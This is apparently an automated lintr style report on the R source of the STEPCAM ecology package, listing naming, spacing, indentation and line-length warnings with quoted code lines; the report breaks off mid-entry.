*style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:19:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:19:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:19:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:207:14:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:18:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:17:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:17:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:17:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:24:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:40:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L214) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:216:24:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:40:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L216) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:217:13:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:13:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L221) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:221:14:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:34:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:21:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L227) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:227:22:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:229:13:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L229) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:229:38:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L229) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:247:54:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L247) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:250:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L250) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:9:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:32:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L251) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:254:27:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L254) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:254:27:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L254) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:255:20:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L255) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:256:20:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:20:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:61:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L264) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:268:63:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L268) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:271:15:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L271) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:272:44:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/ABC_SMC.R#L272) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == 